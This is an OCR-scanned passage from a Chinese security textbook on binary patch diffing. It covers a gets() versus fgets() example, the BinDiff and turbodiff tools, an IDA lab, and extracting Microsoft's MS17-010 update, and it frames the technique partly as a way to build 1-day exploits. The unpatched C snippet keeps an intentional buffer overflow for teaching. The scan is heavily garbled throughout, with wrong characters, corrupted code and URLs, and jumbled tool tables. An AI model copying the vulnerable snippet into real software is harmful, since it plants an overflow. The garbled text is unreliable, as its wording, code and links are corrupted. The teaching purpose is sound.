原因 的 组 合 。 应 用 程序 代码 的 变动 越 多 ， 识 别 出 已 打 补 丁 的 漏 铀 的 难度 也 承 越 大 。 
很 多 情况 下 ， 成 功 识别 出 漏洞 补丁 相关 代码 变化 的 关键 在 于 有 限 的 拔 露 。 考 虑 到 安 
全 补丁 的 本 质 属 性 ， 许 多 机 构 选 择 尽 量 减 少 公布 的 信息 。 从 安全 补丁 中 获取 的 线索 
越 多 ， 那 么 友 现 漏洞 的 可 能 性 也 越 大 。 上 真实 场景 中 能 获取 的 线索 类 型 将 在 本 章 后 面 
加 以 说 明 。 
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下 面 是 一 个 含有 漏 调 的 徐 单 C 代 码 户 段 示例 : 


/*Unpatched code that includes the unsafe gets() function. */ 
int get Name()í 
char name[20]|; 
printf("AnPlease state your name: "); 
gets (name) ; 
printf ("\nYour name is %s.\n\n", name); 
return 0; 
} 
以 下 为 修补 后 的 代码 ; 
/*Patched code that includes the safer fgets() function. */ 
int get Name()í 
char name[20]|; 
printf ("\nPlease state your name: "); 
fgets (name, sizeof(name), stdin); 
printf("\nYour name is %s.\n\n", name); 


return 0; 


} 


第 一 个 程序 片段 的 问题 在 于 使 用 了 gets0 函 数 ， 它 不 能 执行 边界 检查 ， 会 造成 组 
冲 区 溢出 。 修 补 后 的 代码 中 使 用 了 feets0 函 数 ， 它 要 求 以 缓冲 区 的 大 小 作为 参数 进 
行 读 取 操作 ， 这 样 有 助 于 防止 缓冲 区 溢出 。feets0 函 数 因为 不 能 妥善 处 理 空 字 节 ( 比 
如 在 二 进 制 数据 中 ), 而 经 常 被 认为 不 宜 采 用 或 不 被 推荐 作为 最 佳 选 择 方案 使 用 ; 但 
在 这 里 它 其 实 比 sets0 函 数 要 更 好 些 。 稍 后 将 通过 一 个 二 进 制 比较 工具 来 分 析 这 个 简 
单 例子 。 


17.1.2 补丁 比较 


微软 和 甲骨 文公 司 推出 的 安全 补丁 ， 是 二 进 制 比较 最 有 利 可 图 的 目标 。 微 
软 有 一 个 计划 周详 的 月 度 补丁 官 理 流程 ， 一 般 在 每 个 月 的 第 二 个 星期 二 发 布 补 
丁 ， 通 第 是 动态 链接 库 (DLL) 和 驱动 程序 文件 ， 但 也 包括 很 多 其 他 可 更 新 的 文 
本 关 型 。 许 多 组 织 机 构 不 能 及 时 给 系统 打 补 丁 ， 这 融 给 了 黑客 和 渗透 测试 人 员 
可 乘 之 机 一 一 借助 补丁 比较 ， 通 过 公开 泄露 的 或 私下 开 有 友 的 漏洞 攻击 程序 来 入 
侵 系 统 。 从 Windows 10 开 始 ， 微 软 要 求 更 频 索 地 打 补 丁 。 依 赖 于 漏洞 补丁 复杂 
程度 的 不 同 ， 以 及 定位 相关 代码 的 难 易 ， 有 时 在 补丁 发 布 后 的 数 天 之 内 即 能 开 
及 出 可 工作 的 漏洞 攻击 程序 。 通 过 逆 同 工程 安全 补丁 而 挖掘 出 来 的 漏洞 第 被 称 
为 1-day 漏 洞 。 
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随 着 本 章 内 容 的 逐步 展开 ， 你 将 很 快 看 到 比较 驱动 程序 、 库 和 应 用 程序 的 代码 
改动 所 带 来 的 收益 。 虽 然 二 进 制 比较 并 不 是 一 门 新 学 科 ， 但 作为 一 种 可 行 的 用 于 沁 
洞 控 气 及 件 利 的 技术 ， 在 不 断 地 获得 安全 研究 人 员 、 黑 客 及 软件 厂商 的 关注 。l-day 
漏洞 的 价值 虽 比 不 上 0-day 漏 洞 , 但 受到 攻击 后 为 其 开 出 五 位 数 的 高 价 报酬 的 情形 也 
并 不 少见 。 攻 击 框架 供应 商 希 望 与 竞争 对 手相 比 ， 有 更 多 与 私下 泄密 的 漏洞 相关 的 
攻击 程序 。 


17.2 二进制 比较 工具 


通过 使 用 像 交 互 式 反 汇编 右 (Interactive Disassembler, IDA) 这 样 的 反 汇编 右 来 手 
动 分 析 大 量 已 编译 的 代码 ,即使 对 于 经 验 最 丰富 的 安全 研究 人 员 也 是 一 项 艰 巳 任务 。 
而 使 用 免费 的 或 商业 的 二 进 制 比 较 工 具 ， 可 简化 聚焦 于 漏洞 补丁 中 值得 关注 的 相关 
代码 的 过 程 。 此 类 工具 可 节省 花费 在 逆 同 分 析 以 及 与 热门 汤 洞 可 能 无 关 的 代码 上 的 
大 量 时 间 ， 以 下 是 五 种 最 具 知 名 度 的 二 进 制 比较 工具 : 

e Zynamics Bindiff( 人 免费 工具 ) 2011 年 彻 税 谷歌 收购 ， 可 访问 www.zynamics. 
comy/bindiffhtml 下 载 。 需 要 经 过 授权 的 IDA 5.5 或 更 高 版 本 。 
turbodiff(fi2t LAL) 由 Core Security 公 司 的 Nicolas Economou 开 发 ， 可 访问 
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type= 
tool&name-turbodiff F#%. FAY SIDA 4.985.046 91 he EEH. 
patchdiff2( 免 费 工 具 ) 由 Nicolas Pouvesle 开 发 , 可 访问 https:Wcode.google.comy 
p/patchdiff2/ 下 载 。 需 要 经 过 授权 的 IDA 6.1 或 更 高 版 本 。 
Darungrim( 免 费 工 具 ) 由 Jeong Wook Oh(Matt Oh) 开 发 ， 可 访问 www. 
darungrim.org 下 载 。 需 要 最 新 的 DA 授权 有 版 本 。 

Diaphora( 免 费 工 具 ) 由 Joxean Koret 开 发 。 可 访问 https://github.com/ 
joxeankoret/diaphora 下 载 。 只 正式 支持 最 新 的 DA 版 本 。 

上 述 每 个 工具 均 可 作为 DA 插件 运行 ， 通 过 使 用 各 种 技术 和 局 发 式 方法 来 确定 
同一 文件 两 个 版 本 间 的 代码 更 改 。 运 用 上 述 工具 对 同一 输入 文件 进行 操作 时 ， 结 果 
可 能 会 有 所 不 同 。 每 个 工具 都 需要 能 访问 IDA 数 据 库 文件 (.idb)， 因 此 要 求 IDA 为 已 
授权 版 本 ， 或 是 像 turbodiff 那 样 使 用 人 免费 版 本 。 在 本 章 的 所 有 示例 中 ， 我 们 将 使 用 
BinDi 人 工具 以 及 turbodiff。 因 为 后 者 支持 IDA 5.0 免 费 版 ， 所 以 可 通过 多 个 网 站 下 载 。 
这 样 即 便 在 没有 商用 IDA 版 本 的 情况 下 也 能 完成 这 些 练习 。 上 述 工具 中 大 概 只 有 
Diaphora 和 BinDif 还 在 积极 维护 和 公开 更 新 ， 不 过 ，BinDif 的 更 新 频率 较 低 。 提 供 
这 些 优秀 工具 的 作者 都 很 了 不 起 , 使 我 们 节省 了 很 多 耗费 在 查找 代码 更 改 上 的 时 间 。 
REET ETE AS te EA « 
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17.2.1 BinDiff 


前 面 提 到 ，2011 年 初 谷 歌 收 购 了 德国 软件 公司 Zynamics。Zynamics 之 所 以 得 到 
业界 广泛 认同 ， 要 归功 于 其 旗下 的 两 款 经 典 首 癌 工程 辅助 工具 软件 一 Bindiff 和 
BinNavi。 成 功 完 成 收购 后 ， 谷 歌 大 幅 降 低 了 这 些 工具 的 售 价 ， 使 其 更 为 杀 民 。2016 
年 3 月 ， 谷 歌 宣 布 BinDiff 将 不 再 收费 ， 但 不 会 经 音 友 布 版 本 更 新 ， 堆 至 把 写本 书 时 ， 
最 新 版 本 是 BinDiff 4.3。BinDiff 4.3 支 持 macOS， 是 同类 工具 中 的 翘楚 ， 人 允许 对 代码 
和 块 的 改动 进行 深入 分 析 。 到 2018 年 早期 , BinDi 全 尚未 迁移 到 IDA 7.1 和 更 新 版 本 上 :; 
这 随时 可 能 发 生变 化 。 

BinDiff 4.3 作 为 微软 安装 程序 包 (CmsD 的 一 部 
分 发 布 ， 其 安装 非常 简单 ， 仅 需要 一 些 简 单 的 单 | R Binditt 43.0 
击 操作 和 经 过 授权 的 IDA 和 Java SE Runtime Diff Database... 
Environment 8 版 本 。 要 使 用 BinDiff， 需 要 让 IDA 
对 想 要 进行 比较 的 两 个 文件 进行 目 动 分 析 ， 并 将 
结果 保存 为 IDB 文 件 。 完 成 后 在 IDA 中 打开 其 中 
一 个 文件 ， 按 下 Ctrl+6 以 启动 BinDif 的 图 形 用 户 
界面， 如 图 17-1 所 示 。 

接 下 来 单 击 Diff Database 按 钮 ， 选 取 另 一 个 
待 比较 文件 对 应 的 IDB 文 件 ， 该 操作 可 能 会 耗 时 一 两 分 钟 。 一 旦 完成 了 文件 比较 ， 
IDA 中 将 出 现 一 些 新 的 选项 卡 ， 其 中 包括 Matched Functions( Vl GER 20). Primary 
Unmatched( © 2 4s VU fic I ) Fl Secondary Unmatched( x & AS [JU fic Sil). Matched 
Functions 选 项 卡 包 含 在 两 个 文件 中 都 存在 的 函数 ， 对 应 的 函数 可 能 完全 一 致 或 有 所 
改动 。 其 他 选项 卡 可 能 是 关闭 的 。 在 Similarity( 相 似 性 ) 一 栏 中 ， 对 比 的 每 个 函数 都 
会 有 一 个 相似 度 评 分 ， 分 值 在 0 到 1.0 之 间 ， 如 图 17-2 所 示 。 分 值 越 低 ， 表 明 访 函数 
在 两 个 文件 中 的 变动 就 越 大 。 关 于 Primary Unmatched 和 Secondary Unmatched 选 项 
F, 来 日 Zynamics 的 说 明 如 下 :“ 前 者 显示 了 存在 于 当前 打开 的 数据 库 中 , 但 与 被 比 
较 的 数据 库 坚 无 关联 的 函数 ;而 后 者 列 出 了 存在 于 被 比较 的 数据 库 中 ， 但 与 前 者 无 
关 的 其 他 函数 。” 


图 17-1 ”BinDiff 的 图 形 用 户 界 面 


similarity confide change EA primary name primary EA secondary name secondary 


图 17-2 对比 的 每 个 函数 部 会 有 一 个 相似 度 评分 
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进行 比较 时 需要 选取 正确 的 文件 版 本 ， 这 一 点 很 重要 ， 这 样 才能 获取 最 准确 的 
结果 。2017 年 4 月 前 从 微软 的 TechNet 下 载 补丁 时 ， 可 看 到 最 右 侧 边栏 的 标题 是 
“Updates Replaced”( 更 新 丛 换 )。 从 2017 年 4 月 开始 ， 获 取 补 丁 的 过 程 更 简便 。 单 击 
该 处 的 链接 ， 可 找到 最 近 更 新 的 补丁 。 像 mshtml.dll 这 样 的 文件 几乎 每 个 月 都 要 发 布 
新 了 外 本 。 和 看 对 数 月 前 的 文件 与 最 近 刚 更 新 的 补丁 文件 进行 比较 ， 两 者 之 间 的 差异 之 
大 将 导致 分 析 过 程 异 常 困难 。 其 他 一 些 文 件 不 会 经 常 打 补 丁 ， 单 击 前 面 提 到 的 
Updates Replaced 链 接 将 跳 转 全 最 近 更 新 的 相关 文件 ， 从 而 进行 正确 版 本 比较 。 当 
BinDi 全 识别 出 值得 关注 的 函数 后 ， 夺 要 生成 可 视 化 的 比较 结果 ， 可 在 Matched 
Functions 选 项 卡 中 右 击 并 选中 View Flowgraphs， 或 单 击 想 要 检查 的 函数 并 按 下 
CtrltE。 图 17-3 显 示 了 一 个 可 视 化 文件 比较 结果 示例 。 注 意 ， 为 适合 页 面 的 大 小 ， 
图 请 并 没有 放大 到 能 看 清 反 汇编 代码 的 程度 。 
prima | secondary 


图 17.3 "基于 BinDiff 的 可 视 化 文件 比较 
17.22 turbodiff 


本 章 将 讨论 的 另 一 个 工具 是 turbodiff， 因 其 可 与 IDA 5.0 免 费 版 一 起 工作 。 
DarunGrim 和 patchdiff2 也 是 很 强大 的 工具 , 但 它们 只 能 运行 在 经 过 授权 的 IDA 中 , 对 
于 那些 不 具有 或 未 购买 该 正版 软件 的 读者 而 言 ， 束 个 能 边 阅 读 边 完成 本 草 的 练习 。 
DarunGrim 和 和 patchdiff2 的 用 户 界 面 都 很 友好 ,也 很 容易 和 IDA 和 集成 。 具体 的 安装 使 用 
说 明 可 参见 本 章 的 “扩展 阅读 ” Diaphora 是 BinDiff 的 另 一 个 完美 蔡 代 ， 建 议 试 用 ， 
并 将 其 与 BinDiff 做 一 番 比 较 。 

如 前 所 述 , turbodiff 插 件 可 通过 网 站 http:Wcorelabs.coresecurity.comy 人 免费 下 载 , 使 
用 时 需要 遵循 GPLv2 许 可 。 最 新 稳定 版 本 是 1.01b r2, 发 布 于 2011 年 12 月 19 日 。 使 用 
turbodiff 时 ， 必 须 将 两 个 待 比较 的 文件 依次 加 载 到 IDA 中 。IDA 目 动 分 析 完 第 一 个 文 
件 后 , 按 下 CtrlHF11 会 弹出 turbodiff 窗 口 。 首 次 分 析 文 件 时 , 选中 take info from this idb 
选项 卡 ， 并 单 击 OK 按钮 。 接 痢 对 第 二 个 文件 重复 同样 的 操作 步骤 。 当 两 个 文件 均 完 
成 上 述 操作 后 ， 再 次 按 下 Ctrl+F11 组 合 键 ， 选 择 compare with... 选 项 ， 并 选择 第 二 个 
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IDB 文 件 ， 将 出 现 如 图 17-4 所 示 的 窗口 。 


Cp Turbodiff results 


category 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
suspicious 十 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 
SUSPICIOUS + 


address 


14255c 
144628 
158043 
168df3 
1691 b2 
15825c 
153233 
1723d5 
13613 
15d4e 
196fb 
19b71 
Tesch 
1fac4 


name 
sub 14255C 
sub. 144548 
FIBpPCF CaptureS QMD atal) 
FisslueryPortlndex[x. s] 
Ipv6NotifyPotentialFouterChangeAtPassive(s] 
HssEnumerateAlllnterfaceP arameters(x] 
HssEnumeratelnterfaces[x.x.x] 
IPS ecl pdateUfflaadStatus[] 
IpplinterfaceB wPersistParameters[x] 
wWfp&cquireSmallwrnteLack[x x] 
INETADDR, &DDRES5(x) 
IpplsinterfacelnS copel[x.x] 
IppLinkLocal&ddressConfiguration T imeout(s. x] 
IppRiesetNeighborsU nderN S Lock[x. s. x] 
lppGetAddressS et[x.x) 
OlmS cheduleW ork QueueR outine[x] 
|ppw alidateS ettingsU nFiecennect[x| 
IppGetMextCompartment[x x) 

amler an aat 


Pial amler um 4m oe 


address 


13e98b 
141ab2 
154df4 
154153 
1543bb 
155388 
1553bf 
1be3/7 
2b0d2 
213ba 
135a4 
1c9a7 
2417c 
19717? 


Fr —" 一 一 -一 一 一 


图 17-4 turbodiff 的 输出 结果 . 


name 


sub 13E 985 

sub 141AB2 

FispPCF Captures QMD ata 
RssQueryPortlndes 

Ipv6NotityPotentialF outerChangeAtPassive 
HssEnumerateállInterfaceParameters 
FHissEnumeratelnterfaces 

IPS ecUpdatellffloadStatus 
IppinterfaceBwfPersistParameters(x) 
W'Ip&cquireSmallw'riteL ack [xx] 
INETADDR, ADDRESS(x] 
IpplsinterfacelnScopel[x.x) 
IppLinkLocal&ddressConfigurationT imeout(x x] 
IppRiesetNeighborsU nderNSLock(s.s.x) 
Ipplaet&ddressS Et SA] 

OlmS cheduleW ork Q ueueR outinelx] 

lpp¥ alidateS ettingsUnReconnect(x] 
IppGetNextCompartment[x x) 


TERT 


可 在 category 一 栏 中 看 到 一 些 标 签 ， 如 identical、suspicious +, suspicious 十 + 和 


changed。 每 个 标 


签 的 意义 均 不 相同 ， 


检查 者 可 放大 目 己 感 兴趣 的 函数 ， 特 别 是 


suspicious + 和 suspicious ++。 这 些 标 倒 表明 已 检测 到 选 定 函数 内 的 一 个 或 多 个 块 的 校 
验 和 ， 以 及 指令 数量 是 个 及 生 了 变化 。 当 双击 指定 的 函数 名 时 ， 两 个 函数 的 可 视 化 
比较 结果 将 出 现在 各 目的 窗口 中 ， 如 图 17-5 所 示 。 


县 WinGraph32 - turbodiff - 2 - WfpN... | c» | 巴 


File View Zoom Move 


3| eje[m[v || F elele] [$ 


ID. TD 
ZI chk-iDicc 


push [ebprarg. n] 


h 


Help 


ID. n 
Tedi: chk-iDicc 


pus BH . 
call de: inp -EHF ree oo lv ith ages; ExFreePoo Withtagls zu 
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图 17-5 


2, WinGraph32 - turbodiff - 1 - WfpN... 


File View | Zoom 


[sbprarg. 0] 
ei. 


œo sl 


Move Help 


ds: inp. ErfreePoo IV itnTages; E-freePoo TW TtriTag ly Hw) 


il (0,0) 
基于 turbodiff 的 可 视 化 比较 结果 


国 


B nodes, 4 edge seg ments, 0 cros Li 
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17.2.3 ”实验 17-1: 首次 文件 比较 
CX ER: 本 实验 和 其 他 实验 一 样 ， 提 供与 设置 相关 的 README 说 明文 本 。 本 


Vox 实验 需要 将 两 个 ELF — 3E Fl X H name fe name2 复制 到 文件 夹 
C:\grayhat\app di 色 ， 并 创建 子 文件 夹 app diff. 如 果 还 没有 C:grayhat 文 件 


夹 ， 现 在 就 创建 一 个 ; 当然 ， 也 可 以 使 用 其 他 目录 。 


本 实验 将 对 17.1.1 贡 展示 的 代码 进行 徐 单 比较 ， 同 时 比较 两 个 ELF 二 进 制 文件 
name 和 name2。 其 中 name 文 件 是 未 打 补 丁 的 版 本 ，name2 则 是 打 过 补丁 的 版 本 。 痛 
先 需要 启动 已 安装 的 IDA 5.0 免 费 软 件 ， 启 动 并 运行 后 ， 前 往 File | New 菜 单 ， 从 弹出 
窗口 中 选择 Unix 选 项 卡 ， 并 单 击 最 左 侧 的 选项 ， 如 图 17-6 所 示 ， pT 


a New disassembly database 


.. PDAs/Handhelds/Phones Consoles | Embedded Various files 
Windows | DOS Unix Mac Java NET Various OS's 


ELF/COFF/S. ELF/CO FF ELF/COFF?...  ELF/COFF sl HP- Ux 
AR Dynamic... Object File Static Library SOM Dyna... 
M Executable 


图 17-6 ”在 弹出 窗口 中 选择 Unix 选 项 卡 


浏览 到 C:\grayhat\app diff\folder 并 选中 文件 name， 接 着 接受 出 现 的 默认 选 
项 。IDA 应 该 很 快 就 能 完成 自动 分 析 ， 反 汇编 窗口 将 默认 显示 main0 函 数 ， 如 图 
17-7 所 示 。 

按 下 CtrlHtF11 将 弹出 twrbodi 全 窗口 。 夺 未 出 现 ， 返 回 之 前 的 步 又 并 确认 是 人 否 成 功 
复制 了 进行 比较 所 需 的 所 有 文件 .屏幕 上 出 现 turbodiff 窗 口 后 ,选中 take info from this 
idb 选项 ， 并 连续 单 击 两 次 OK 按钮 。 接 下 来 前 往 File | New 玉 旱 ， 此 时 会 出 现 一 个 弹 
出 窗口 ， 询 问 是 个 保存 数据 库 ， 接 受 默 认 值 并 单 击 OK 按 钮 。 选 中 Unix 选 项 卡 ， 使 用 
ELF COFF/AOUT/QNX/SOM Executable 执 行 同样 的 操作 后 ， 单 击 OK 按 钮 。 打 开 
name? ELF 二 进 制 文件 并 接受 默认 值 。 重 复 前 面 的 步骤 ， 在 turbodiff 绊 出 窗口 中 选择 
take info from this idb 选 项 。 
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; Attributes: bp-based frame 


public main 
Main proc near 


|var 187 dword ptr -18h 
larg 8- dword ptr 8 


ebp 
ebp, esp 
| ar esp, 8BFFFFFFFüh 
| esp, 1üh ; status 
[ebptarg 8], 1 
short loc 88585548 


[esp+19h+uar 18], offset aThereIsNoHelpH ; "There is no help menu or usage informat"... 

puts 

[esp*18h«var 18], 1 getName 
_exit mou eax, 0 


main endp 


图 17-7 IDA 反 汇编 窗口 


对 两 个 文件 均 完 成 上 述 操作 后 , 再 次 按 下 Ctrl+F11, 将 在 IDA 中 打开 name2 文 件 。 
选中 compare with 选项 并 单 击 OK 按 钮 。 选 择 name.idb 文 件 后 ， 再 连续 单 击 两 次 OK 
按钮 。 此 时 将 出 现 如 图 17-8 所 示 的 界面 ( 奉 想 复制 精确 的 图 像 ， 需要 按 category 进 行 
排序 )。 


4 category address name address 
unmatched 1 804a034 fgetscXxeaLIBC. 2.0 


SUSPICIOUS ++ 


SLISDICIOUS ++ 
suspicious + 
suspicious + 


identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 
identical 


|Line 4 of 31 


8U04852c 
80484e4 
8048580 
S04837c 
8048600 
80485f2 
50485f0 
2046543 
80484c0 
0046460 
8048430 
8048420 
al4341U 
8048400 
80483f0 
80483el 
80483c0 


iu 49 dace 


.lerm, proc 

getM ame 

. lbc csu mit 

nit prac 

. do global ctors aux 
.. 1585. get. pc. thunk. bx 
. lbc csu fini 

main 

frame durmy 

. do global dtors aux 
start 

.. libe, start. main 

exit 

.. gmon star — 

.puts 

. Stack chk, fail 
„printf 


==-- rr MMi a A 


a0485fc 
Bai484c4 
3048550 
8048354 
80485d0 
230485c2 
20485c0 
8048513 
30484a0 
8048441) 
8048410 
8048400 
S0483IU 
80483en0 
80483d0 
80483c0 
30483a0 


4 i 


.term_proc 

getName 

. Abc csu init 

Anit. prac 

. do global ctors aux 
... 1686. get_pc_thunk.bx 
. [bc csu hni 

main 

frame. dummy 

. dao global dtors aux 
_ Start 

. bec start main 

exit 

.. gmon start — 

puts 

. stack chk fail 
.printf 


-irr Mm 73 hà 


{17-8 KOH LOR SG AR 


iEx£getNameOPR ZU RIGA “suspicious ++”, Xi getName At, aJ ELUN 
图 17-9 所 示 的 窗口 。 
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#& WinGraph32 - turbodiff - 2 - getName co iB, 3S J& WinGraph32 - turbodiff - 1 - getName c BS 


File View Zoom Move Help 


| File View Zoom Move Help 


a| «Jem |] F ejes [x 5| «Jamie [e| s ele x 


= 00% ((3,-2) 3 nodes, 4 edge segments, 0 crossings 74 一 33% (-9,-2) 3 nodes, 4 edge segments, Ü crossings 
图 17-9 ”双击 getName0 函 数 后 弹出 的 窗口 
从 图 17-9 可 以 看 出 ， 左 侧 友 右 侧 窗口 分 别 显 示 了 打 过 补丁 的 函数 和 未 打 补 丁 的 
函数 。 后 者 使 用 的 是 不 提供 边界 检查 的 gets0 函 数 ， 而 前 者 使 用 了 feets0 函 数 ， 它 需 
要 一 个 表示 绥 冲 区 大 小 的 参数 以 防止 溢出 。 补 丁 部 分 的 反 汇 编 代 码 如 下 所 示 : 


mov eax, ds:stdin@@GLIBC 2 0 
mov lespt+38htvar 30], eax 
mov lespt38htvar 34], 14h 
lea eax, [ebptvar 20] 

mov [espt38htvar 38], eax 
call _fgets 


以 上 两 个 函数 的 内 部 还 有 一 些 额外 的 代码 块 ， 包 括 没有 改动 的 代码 部 分 。 它 们 
是 简单 的 堆栈 溢出 保护 代码 ， 用 于 检验 堆 canarics， 后 面 是 函数 结束 块 。 本 实验 到 此 
结束 ， 接 下 来 让 我 们 看 一 下 现实 世界 中 比较 的 例子 。 


17.3 补丁 管理 流程 


包括 甲骨 文 、 微 软 和 苹果 在 内 的 每 个 软件 厂商 都 有 目 己 的 补丁 友 布 流程 。 其 中 
一 些 上 了 阐 有 一 整套 补丁 友 布 计划 ， 为 一 些 则 并 未 设 定 具 体 的 时 间 表 。 币 软 束 有 一 个 
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持续 的 补丁 发 布 周 期 ， 适 合 于 需要 维护 大 量 系 统 并 按照 计划 有 条 不 率 进 行 的 情形 。 
对 组 织 机 构 而 言 ， 计 划 外 安全 更 新 可 能 会 有 问题 ， 因 为 可 能 没有 推广 更 新 所 需 的 次 
源 。 我 们 将 主要 关注 微软 的 补丁 管理 流程 ， 因 为 该 流程 已 经 比较 成 熟 ， 而 且 通 第 是 
以 获 利 为 目的 的 漏 铜 挖掘 的 主要 比较 目标 。 


17.3.1 ”微软 星期 二 补丁 


每 月 的 第 二 个 星期 二 是 微软 的 月 度 补 本 上 帮 布 日 ， 偶 有 重要 的 计划 外 安全 更 新 。 
这 个 过 程 可 用 于 Windows 7 和 Windows 8( 从 2016 年 10 月 开始 )， 在 推出 Windows 10 
累积 更 新 后 及 生 了 变化 ,改变 了 补丁 的 下 载 方式 。 和 截至 2017 年 4 月 ， 每 个 更 新 的 小 疆 
和 和 安全 补丁 可 见 https://technet.microsoft.com/en-us/security/bulletin。2017 年 4 月 后 ， 可 
从 Microsoft Security TechCenter 站 点 https://portal.msrc.microsoft.com/en-us/security- 
suidance 获 取 补 丁 ， 汇 总 信息 位 于 https:/portalmsrc.microsoft.comyen-us/security- 
guidance/summary。 补 丁 通 钊 可 通过 Windows 控 制 面板 中 的 更 新 工具 、Windows 服 务 
At Lt Nk (Windows Server Update Services，WSUS) 或 适用 于 企业 的 Windows 更 
新 (Windows Update for Business，WUB) 来 获取 。 要 对 这 些 补丁 进行 比较 ， 可 使 用 前 
面 提 到 的 TechNet 链 接 来 获取 。 

每 个 补丁 公告 均 有 评 细 更 新 信息 的 链接 。 有 些 更 新 针对 公开 披露 的 漏洞 ， 大 多 
数 则 针对 某 种 私下 协商 告知 的 漏洞 。 图 17-10 展 示 了 这 样 一 个 私下 披露 漏洞 的 例子 。 


Microsoft Security Bulletin MS17-018 - Important 


Security Update for Windows Kernel-Mode Drivers (4013083) 


Published: March 14, 2017 


Version: 1.0 


Executive dad 


Bs € nes ate resalves vulne a saft Wir acd s. The vulnerabilities Puis llow € 
lege ne ogs ont affecte ds ses ema pak spe iyc rafted a applica fia to arn 
aie Per or area sesh antral of an affected syst 


For more information about the vulnerabilities, see the Vulnerability Information section. 


Fe a es the vulnerabilities by correcting how the Windows kemel-mode driver handles 
hiec Y. 


图 17-10 ”私下 拔 露 漏洞 


如 你 所 见 ， 关 于 漏洞 的 描述 ， 这 里 仅 有 一 些 非常 有 限 的 信息 。 而 提供 的 信息 越 
多 ， 定 位 补丁 代码 并 创建 漏洞 攻击 程序 的 速度 束 会 越 快 。 因 为 更 新 的 大 小 以 及 漏洞 
的 复杂 性 不 同 ， 补 本 代码 的 碍 找 本 身 就 很 有 挑战 性 。 通 第 存在 漏洞 的 条 件 仅 是 理论 
上 的 ， 或 仅 在 特定 条 件 下 触发 。 这 样 就 会 增加 确定 根本 原因 和 生成 用 来 成 功 触发 缺 
陷 的 概念 验证 代码 的 难度 。 确 定 了 根本 原因 并 且 定 位 到 可 能 存在 漏洞 的 代码 后 ， 即 
可 在 调试 器 中 进行 分 析 ， 硅 要 适合 于 攻击 的 话 ， 还 需要 确定 获取 代码 执行 控制 权 的 
难 易 程度 。 
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17.3.2 ”获得 并 提取 微软 补丁 


在 进行 实验 前 ， 先 来 看 一 个 获得 和 提取 Windows 10 累 积 更 新 的 示例 。 在 2017 年 
4 月 前 ， 可 从 Microsoft TechNet(https://technet.microsoft.com/en-us/library/security/ 
dn631937.aspx)3A £3 RIRE Jr; 从 2017 年 4 月 开始 ， 可 从 https://portal.msrc.microsoft. 
com/en-us/security-guidance 获 取 累 积 更 新 。 本 例 伍 找 的 是 MS17-010， 于 2017 年 3 月 友 
布 ， 它 使 用 SMB 修 复 了 多 个 缺陷 。 可 访问 https://technet.microsoft.com/en-us/library/ 
security/ms17-010.aspx 以 获取 此 漏洞 的 信息 。 岁 17-11 显 示 了 安全 修复 概要 。 


Operating 
System 


Windows 10 


Windows 10 
for 32-bit 


Systems [3] 


(4012606) 


Windows 10 
for x64-based 
Systems [3] 
(4012606) 


Windows 10 
Version 1511 
for 32-bit 
Systems [3] 
(4013198) 


Windows 
SMB Remote 
Code 
Execution 
Vulnerability 
— CVE-2017- 
0143 


Critical 
Remote Code 
Execution 


Critical 
Remote Cade 
Execution 


Critical 
Remote Code 
Execution 


Windows 
SMB Remote 
Code 
Execution 
Vulnerability 
—- CVE-2017- 
0144 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Windows 
SME Remote 
Code 
Execution 
Vulnerability 
—- CVE-2017- 
0145 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Windows 
SME Remote 
Code 
Execution 
Vulnerability 
- CVE-2017- 
0146 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Windows 
SMB 
Information 
Disclosure 
Vulnerability 
= CVE-2017- 
0147 


Important 
Information 
Disclosure 


Important 
Information 
Disclosure 


Important 
Information 
Disclosure 


Windows 
SMB Remote 
Code 
Execution 
Vulnerability 
— CVE-2017- 
0148 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Critical 
Remote Code 
Execution 


Updates Replaced 


3210720 


3210720 


3210721 


图 17-11 ”安全 修复 概要 


我 们 将 专注 于 CVE-2017-0147(Windows SMB Information Disclosure Vulnerability) 
以 识别 修复 的 问题 。 育 先 必须 下 载 和 提取 更 新 。 使 用 指 同 MS17-010 的 上 述 链 接 ， 单 


击 后 ， 通 过 Microsoft Catalog Server 下 载 32 位 Windows 10 更 新 ， 如 图 17-12 上 所 示 。 


Windows 10 


Windows 10 Critical Critical Critical Critical Important Critical 3210720 
for 32-bit Remote Code Remote Code Remote Code Remote Code Information Remote Code 
Execution Execution Execution Execution Disclosure Execution 


Systems [3] 
(4012606) 


图 17-12 下载 32 位 Windows 10 更 新 


左 侧 标注 的 区 域 便 是 通过 Microsoft Catalog Server 下 载 更 新 的 链接 。 右 侧 标注 的 
链接 是 Updates Replaced 字 段 ， 单 击 该 链接 ， 将 获得 相关 文件 最 近 一 次 打 补 丁 的 更 新 
信息 。 如 朱 于 2017 年 10 月 更 新 了 srv.sys 文 件 , 并 且 前 一 次 打 补 丁 的 时 间 是 2017 年 7 月 ， 
那么 可 单 击 Updates Replaced 链 接 以 获得 更 新 信息 。 了 解 这 些 是 十 分 重要 的 ， 因 为 你 
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始终 想 要 比较 最 接近 的 两 个 版 本 , 这 样 , 功能 的 任何 变化 都 与 你 感 兴趣 的 CVE 相 关 。 

现在 ， 已 经 下 载 了 2017 年 3 月 的 32 位 Windows 10 累 积 更 新 。 我 们 将 使 用 Greg 
Linares 创 建 的 PatchExtract 工 具 来 方便 地 进行 提取 。PatchExtract 是 一 个 PowerShell 脚 
本 ， 使 用 微软 扩展 工具 和 其 他 命令 来 提取 和 组 织 已 下 载 的 MSU 文 件 以 及 后 缀 为 Cab 
的 文件 中 包含 的 很 多 文件 。 截 至 撰写 本 书 时 ，PatchExtract 1.3 仍 是 最 新 版 本 ， 可 从 
https:Wpastebin.comy/VjwNV23n 获 取 ，Greg 的 推 竺 账号 是 @Laughing Mantis。 还 有 一 
个 相关 的 PowerShell 脚 本 PatchClean， 可 帮助 更 好 地 组 织 已 提取 的 更 新 ， 并 确保 仅 将 
